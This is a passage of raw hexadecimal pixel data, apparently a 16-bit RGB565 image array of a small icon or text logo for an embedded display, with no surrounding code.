0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xd103, 0xd123, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd185, 0xd185, 0xd123, 0xd103, 0xd0e3, 0xda48, 0xed55, 0xecb2, 0xe34c, 0xd9c6, 0xd103, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd9c6, 0xd9c6, 0xd123, 0xe38d, 0xec91, 0xe30b, 0xda07, 0xe3ef, 0xff1c, 0xffff, 0xff5d, 0xec71, 0xd164, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd123, 0xd103, 0xd103, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd103, 0xd103, 0xd124, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd103, 0xd103, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd123, 0xd103, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd123, 0xd103, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd124, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd103, 0xd103, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd9c6, 0xf638, 0xda27, 0xed14, 0xffff, 0xffff, 0xffff, 0xff1c, 0xe430, 0xd9c6, 0xe3ce, 0xffff, 0xffff, 0xf679, 0xd9c6, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xd185, 0xe3ad, 0xecd3, 0xecd2, 0xe32c, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xdaca, 0xec71, 0xecf3, 0xecb2, 0xe36d, 0xd1a5, 0xd123, 0xd185, 0xd185, 0xd185, 0xd144, 0xda89, 0xecd3, 0xed34, 0xed14, 0xed13, 0xed13, 0xed14, 0xec92, 0xda28, 0xd123, 0xd185, 0xd185, 0xd185, 0xd9a5, 0xec50, 0xed13, 0xed13, 0xed13, 0xed13, 0xed13, 0xe430, 0xd9e6, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xda48, 0xec50, 0xecf3, 0xec50, 0xda48, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd9c6, 0xe3ce, 0xecf3, 0xed13, 0xec71, 0xdaeb, 0xd124, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd9e7, 0xe40f, 0xecf3, 0xed13, 0xec51, 0xdaaa, 0xd123, 0xd164, 0xd185, 0xd185, 0xd185, 0xd144, 0xe34c, 0xda69, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xda89, 0xecb2, 0xed55, 0xed14, 0xe38d, 0xd164, 0xd124, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xed95, 0xec71, 0xd0e2, 0xf659, 0xff7d, 0xffff, 0xffff, 0xffff, 0xffff, 0xff5c, 0xe32b, 0xda27, 0xff1c, 0xffff, 0xf69a, 0xd164, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe30b, 0xf6ba, 0xf5f7, 0xecb2, 0xecd2, 0xf679, 0xed75, 0xd144, 0xd185, 0xd185, 0xd144, 0xd9c6, 0xf5f7, 0xf679, 0xed34, 0xecb2, 0xecf3, 0xf5f7, 0xf6ba, 0xe3ce, 0xd144, 0xd185, 0xd185, 0xd103, 0xe430, 0xf6ba, 0xe3ef, 0xec50, 0xec50, 0xec50, 0xe430, 0xed13, 0xff1c, 0xe32b, 0xd123, 0xd185, 0xd164, 0xda07, 0xff5d, 0xec91, 0xe450, 0xec50, 0xec50, 0xec50, 0xed75, 0xfefb, 0xdaa9, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd124, 0xecf3, 0xf6da, 0xed54, 0xec91, 0xed54, 0xf6fb, 0xe34c, 0xd124, 0xd185, 0xd185, 0xd103, 0xe38d, 0xf6db, 0xf5d6, 0xecb2, 0xec91, 0xed34, 0xf679, 0xf638, 0xda48, 0xd144, 0xd185, 0xd185, 0xd103, 0xe40f, 0xf6fb, 0xf5b6, 0xecb2, 0xec91, 0xed54, 0xf699, 0xf5f7, 0xda07, 0xd164, 0xd185, 0xd185, 0xd103, 0xf5f7, 0xe40f, 0xd123, 0xd185, 0xd185, 0xd185, 0xd123, 0xec91, 0xf6ba, 0xecb2, 0xe3ee, 0xec50, 0xf617, 0xf699, 0xdaca, 0xd144, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd144, 0xdaeb, 0xf638, 0xd0c2, 0xd185, 0xda69, 0xda69, 0xdaa9, 0xe40f, 0xf6ba, 0xffff, 0xffff, 0xffff, 0xecb2, 0xd9c6, 0xfefb, 0xffff, 0xecb2, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xe32c, 0xff7d, 0xe34c, 0xd103, 0xd103, 0xd0e3, 0xd165, 0xdaaa, 0xd185, 0xd185, 0xd185, 0xd164, 0xf679, 0xed13, 0xd144, 0xd0e3, 0xd103, 0xd103, 0xd103, 0xe32b, 0xec50, 0xd144, 0xd185, 0xd185, 0xd103, 0xe450, 0xecf3, 0xd081, 0xd103, 0xd103, 0xd103, 0xd103, 0xd0c2, 0xe30b, 0xfefb, 0xd9c6, 0xd165, 0xd165, 0xda07, 0xf699, 0xd165, 0xd0e3, 0xd103, 0xd103, 0xd103, 0xd0c2, 0xe3ae, 0xf6ba, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xf658, 0xd9c6, 0xd0e3, 0xd103, 0xd0e3, 0xda28, 0xda48, 0xd165, 0xd185, 0xd124, 0xe32c, 0xff5d, 0xdaca, 0xd0e3, 0xd103, 0xd103, 0xd0e3, 0xd144, 0xe430, 0xdaeb, 0xd144, 0xd185, 0xd123, 0xe3ce, 0xff3c, 0xda48, 0xd0e3, 0xd103, 0xd103, 0xd0e3, 0xd185, 0xec71, 0xda89, 0xd144, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ce, 0xd123, 0xd185, 0xd185, 0xd123, 0xe3ae, 0xf6fb, 0xd9a6, 0xd0e2, 0xd123, 0xd103, 0xd103, 0xe3ce, 0xf6db, 0xda07, 0xd164, 0xd185,
0xd185, 0xd185, 0xd185, 0xd103, 0xed54, 0xe38d, 0xe32b, 0xfefb, 0xffbe, 0xff7d, 0xf638, 0xe40f, 0xda27, 0xe3ae, 0xffbe, 0xffff, 0xffff, 0xed13, 0xda27, 0xffbe, 0xffbe, 0xda07, 0xd164, 0xd185, 0xd185, 0xd165, 0xd9c6, 0xff3c, 0xe30b, 0xd0e2, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd185, 0xd185, 0xd123, 0xe3ae, 0xf638, 0xd0e2, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xd185, 0xd185, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0e2, 0xf5f7, 0xe3ce, 0xd123, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf679, 0xe30b, 0xd144, 0xd185, 0xd185, 0xd103, 0xe40f, 0xf6ba, 0xd123, 0xd144, 0xd185, 0xd185, 0xd185, 0xd164, 0xd164, 0xd185, 0xd185, 0xd123, 0xf638, 0xe3ad, 0xd0e2, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xd144, 0xd185, 0xd185, 0xd164, 0xf69a, 0xdaeb, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd164, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ce, 0xd123, 0xd185, 0xd185, 0xd103, 0xf5f7, 0xe3ce, 0xd0e3, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xd9e7, 0xd9c6, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xf5d6, 0xe34c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xff7d, 0xe38d, 0xda27, 0xff3c, 0xffff, 0xffff, 0xe3ad, 0xe38d, 0xffff, 0xe3ef, 0xd103, 0xd185, 0xd185, 0xd103, 0xecb2, 0xed95, 0xd0c2, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe430, 0xf595, 0xd0a1, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0c2, 0xf5d6, 0xe3ef, 0xd123, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf659, 0xe32c, 0xd144, 0xd185, 0xd185, 0xd185, 0xf6da, 0xdaca, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xf679, 0xdaca, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xf6ba, 0xda28, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ce, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5d7, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd164, 0xda48, 0xed54, 0xecb2, 0xffff, 0xffdf, 0xecd2, 0xecd3, 0xf6db, 0xffff, 0xffff, 0xffff, 0xec91, 0xda07, 0xff9e, 0xffff, 0xffbe, 0xd9e7, 0xf6db, 0xf5b6, 0xd103, 0xd185, 0xd165, 0xd103, 0xf658, 0xdaeb, 0xd103, 0xd164, 0xd164, 0xd164, 0xd164, 0xd164, 0xd165, 0xd185, 0xd185, 0xd164, 0xda07, 0xff1c, 0xe3ae, 0xd103, 0xd103, 0xd144, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe430, 0xed13, 0xd081, 0xd123, 0xd123, 0xd123, 0xd123, 0xd0c2, 0xdaaa, 0xff1c, 0xda07, 0xd164, 0xd165, 0xda07, 0xf69a, 0xd185, 0xd103, 0xd123, 0xd123, 0xd123, 0xd0c2, 0xe36d, 0xfefb, 0xd185, 0xd165, 0xd185, 0xd103, 0xdaeb, 0xf658, 0xd103, 0xd164, 0xd164, 0xd164, 0xd164, 0xd164, 0xd164, 0xd185, 0xd185, 0xd185, 0xd123, 0xe450, 0xf6da, 0xda07, 0xd0e3, 0xd103, 0xd144, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xecf3, 0xf679, 0xd9c6, 0xd0e3, 0xd123, 0xd144, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd165, 0xd0a1, 0xf5b6, 0xe34c, 0xd0c2, 0xd123, 0xd123, 0xd123, 0xd123, 0xd123, 0xd144, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd144, 0xdaaa, 0xed34, 0xecb2, 0xffff, 0xffdf, 0xecb2, 0xe32c, 0xda07, 0xe36d, 0xff9d, 0xffff, 0xffff, 0xe3ae, 0xe36c, 0xffff, 0xffff, 0xecd2, 0xe3ae, 0xf679, 0xd103, 0xd185, 0xd9c6, 0xda68, 0xf6ba, 0xdaa9, 0xda07, 0xda28, 0xda28, 0xda28, 0xda28, 0xda28, 0xda07, 0xd185, 0xd185, 0xd185, 0xd124, 0xdaaa, 0xf69a, 0xf638, 0xec71, 0xe30b, 0xda27, 0xd164, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd103, 0xe40f, 0xf618, 0xe34c, 0xe3ae, 0xe3ae, 0xe3ae, 0xe38d, 0xecb2, 0xff3c, 0xe38d, 0xd123, 0xd185, 0xd165, 0xd9e7, 0xf6db, 0xe3ee, 0xe38d, 0xe3ad, 0xe38d, 0xe34c, 0xec71, 0xf6fb, 0xe30b, 0xd124, 0xd185, 0xd1a5, 0xd9a6, 0xec71, 0xf5b6, 0xd9a5, 0xda28, 0xda28, 0xda28, 0xda28, 0xda28, 0xda28, 0xd9c6, 0xd185, 0xd185, 0xd185, 0xd124, 0xec91, 0xf6db, 0xed95, 0xe3ef, 0xdaaa, 0xd9e6, 0xd124, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xecf3, 0xf6da, 0xed54, 0xe3ce, 0xdaa9, 0xd9c6, 0xd123, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd164, 0xda27, 0xe34c, 0xf699, 0xecf3, 0xe36d, 0xe3ae, 0xe3ae, 0xe3ae, 0xe3ae, 0xe3ae, 0xdaea, 0xd164, 0xd185, 0xd185,
0xd185, 0xd185, 0xd164, 0xda69, 0xed95, 0xda89, 0xffff, 0xffff, 0xffff, 0xffff, 0xff7d, 0xe38d, 0xda28, 0xff7d, 0xffff, 0xffbe, 0xda07, 0xf659, 0xffff, 0xff9e, 0xda48, 0xdaca, 0xd164, 0xd144, 0xed34, 0xfefb, 0xffbe, 0xf6da, 0xf6da, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xf5d6, 0xd185, 0xd185, 0xd185, 0xd185, 0xd124, 0xd164, 0xe36d, 0xed34, 0xf638, 0xf679, 0xf659, 0xed34, 0xda27, 0xd123, 0xd185, 0xd185, 0xd103, 0xe3ef, 0xfefb, 0xed95, 0xf5b6, 0xf5b6, 0xf5b6, 0xf5b6, 0xed34, 0xda69, 0xd103, 0xd185, 0xd185, 0xd165, 0xd9e6, 0xff1c, 0xf617, 0xf5f7, 0xf5f7, 0xf5f7, 0xff1b, 0xffff, 0xe38d, 0xd0a2, 0xd1a5, 0xd144, 0xda68, 0xf69a, 0xff7d, 0xff7d, 0xf6ba, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xf6db, 0xe3ce, 0xd123, 0xd185, 0xd185, 0xd185, 0xd103, 0xda07, 0xe430, 0xf5b6, 0xf659, 0xf679, 0xf638, 0xe430, 0xd144, 0xd164, 0xd185, 0xd185, 0xd165, 0xd103, 0xda48, 0xec50, 0xf5b6, 0xf659, 0xf679, 0xf617, 0xe3ce, 0xd124, 0xd165, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd144, 0xdaca, 0xf5b6, 0xff5c, 0xf699, 0xf5b6, 0xf5d7, 0xf5d7, 0xf5d7, 0xf5d7, 0xf5d7, 0xec50, 0xd144, 0xd185, 0xd185,
0xd185, 0xd185, 0xd165, 0xd9c6, 0xf617, 0xd165, 0xe36d, 0xff1b, 0xffff, 0xffff, 0xffff, 0xffff, 0xe3ee, 0xe32c, 0xffff, 0xffff, 0xecb2, 0xe36d, 0xffff, 0xffff, 0xe38d, 0xd0c2, 0xd185, 0xd185, 0xd9a6, 0xda27, 0xf69a, 0xda69, 0xd9c6, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9c6, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd124, 0xd103, 0xd144, 0xd9c6, 0xdaa9, 0xecd2, 0xff3c, 0xdaaa, 0xd144, 0xd185, 0xd103, 0xe450, 0xecf3, 0xd081, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd165, 0xda07, 0xf699, 0xd185, 0xd0e3, 0xd123, 0xd103, 0xd144, 0xe38d, 0xff3c, 0xdaaa, 0xd144, 0xd185, 0xd185, 0xd185, 0xec50, 0xf5b6, 0xd164, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9e7, 0xd9a6, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd103, 0xd103, 0xd164, 0xda07, 0xe32c, 0xf638, 0xf5f7, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd103, 0xd103, 0xd165, 0xda07, 0xe36d, 0xf699, 0xed75, 0xd144, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd164, 0xd0a1, 0xf5b6, 0xe34c, 0xd0a2, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe34c, 0xd0c2, 0xd144, 0xd9c6, 0xe3ce, 0xff9e, 0xffff, 0xffdf, 0xda28, 0xf679, 0xffff, 0xfefb, 0xda68, 0xffbe, 0xffff, 0xed54, 0xd103, 0xd185, 0xd185, 0xd165, 0xd103, 0xf638, 0xe30b, 0xd103, 0xd165, 0xd165, 0xd165, 0xd165, 0xd165, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd144, 0xd0a2, 0xe40f, 0xf638, 0xd123, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd0a2, 0xe430, 0xf638, 0xd123, 0xd185, 0xd185, 0xd123, 0xdaea, 0xf659, 0xd103, 0xd164, 0xd165, 0xd165, 0xd165, 0xd165, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd123, 0xd0e3, 0xf679, 0xe3ef, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd103, 0xd124, 0xf6da, 0xe34c, 0xd124, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5d6, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd123, 0xe3ad, 0xf5b6, 0xd0a2, 0xe34c, 0xec91, 0xd164, 0xe34c, 0xffff, 0xffff, 0xe450, 0xe430, 0xffff, 0xffdf, 0xda89, 0xf6fb, 0xffff, 0xed75, 0xd103, 0xd185, 0xd185, 0xd185, 0xd103, 0xecb2, 0xf5b6, 0xd0c2, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xda07, 0xf69a, 0xd1a5, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd165, 0xd9c6, 0xf6ba, 0xda07, 0xd164, 0xd185, 0xd185, 0xd165, 0xf6ba, 0xdaea, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0e2, 0xec91, 0xed34, 0xd103, 0xd185, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0c2, 0xed34, 0xec91, 0xd103, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5d6, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xf617, 0xe3ce, 0xff7d, 0xffff, 0xf5f7, 0xd103, 0xff3c, 0xffff, 0xed55, 0xe36d, 0xffff, 0xffff, 0xdaea, 0xf638, 0xff1c, 0xd9e7, 0xd164, 0xd185, 0xd185, 0xd185, 0xd165, 0xd9a6, 0xff1c, 0xe32c, 0xd0e2, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xd165, 0xd185, 0xd165, 0xda07, 0xd9e7, 0xd103, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0c2, 0xe3ce, 0xf658, 0xd124, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xf679, 0xda89, 0xd164, 0xd185, 0xd185, 0xd103, 0xe3ef, 0xf6da, 0xd124, 0xd144, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xd185, 0xd185, 0xd185, 0xda48, 0xd144, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd0c2, 0xf638, 0xe40f, 0xd123, 0xd185, 0xda48, 0xd144, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xf69a, 0xe34c, 0xd124, 0xd185, 0xd103, 0xf5b6, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5d7, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xda69, 0xff1c, 0xffbe, 0xffff, 0xecf3, 0xd185, 0xff7d, 0xffff, 0xed34, 0xe36c, 0xffff, 0xffff, 0xe30b, 0xd144, 0xd9e6, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xe30b, 0xff7d, 0xe3ae, 0xd124, 0xd103, 0xd0e3, 0xd185, 0xecd2, 0xda48, 0xd164, 0xd124, 0xe30b, 0xfefb, 0xe40f, 0xd9c6, 0xd103, 0xd103, 0xd103, 0xd123, 0xe34c, 0xff7d, 0xdaea, 0xd144, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd9c6, 0xf6ba, 0xda07, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd1a5, 0xf69a, 0xda07, 0xd144, 0xd185, 0xd185, 0xd185, 0xd103, 0xed75, 0xf679, 0xda27, 0xd103, 0xd103, 0xd0e3, 0xe30b, 0xec50, 0xd144, 0xd185, 0xd124, 0xed54, 0xf638, 0xdaca, 0xd144, 0xd103, 0xd103, 0xd103, 0xd185, 0xed54, 0xf679, 0xd164, 0xd165, 0xd144, 0xf5d7, 0xf5d7, 0xda89, 0xd144, 0xd103, 0xd103, 0xd103, 0xd9a5, 0xf5d7, 0xf5f7, 0xd124, 0xd185, 0xd185, 0xd103, 0xf5d6, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd123, 0xf5f7, 0xe38d, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
